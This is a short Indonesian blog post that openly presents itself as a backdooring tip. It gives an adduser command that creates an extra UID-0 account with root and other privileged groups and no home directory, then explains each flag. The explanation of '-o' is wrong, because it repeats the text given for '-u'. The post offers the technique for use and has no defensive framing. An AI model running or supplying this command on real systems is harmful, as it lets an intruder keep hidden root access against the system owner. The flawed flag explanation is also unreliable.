Catagories

create another root account

terkadang kita memang membutuhkan sebuah account dengan privilages root, tapi bukan root account asli, dan ujung2nya udah pasti >.< BACKDOORING,,,
hm,,, langsung ajah, buka shell nya
dan pastikan anda sudah mendapat akses root untuk hal ini, karena kita akan membuat sebuah root account baru,,,,

di shell ketik :

#/usr/sbin/adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M nick_account_baru

dan penjelasanya adalah :

adduser : Command to create a user in linux
-u : Set the value of user id to 0 which is generally root user id.
-o : Set the value of user id to 0 which is generally root user id.
-g : Set the initial group number to to 0 generally root user group
-G : Supplementary groups 0=root, 1=bin, 2= daemon, 3 = sys, 4= adm, 6=disk, 10 = wheel
-M : User home directory will not be created

CMIIWW!!!
enjoy bro :D

Share and Enjoy:
  • Print
  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Ping.fm
  • RSS
  • Slashdot
  • Socialogs
  • StumbleUpon
  • Twitter
  • Yahoo! Bookmarks
  • Yahoo! Buzz

1 comment to create another root account

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>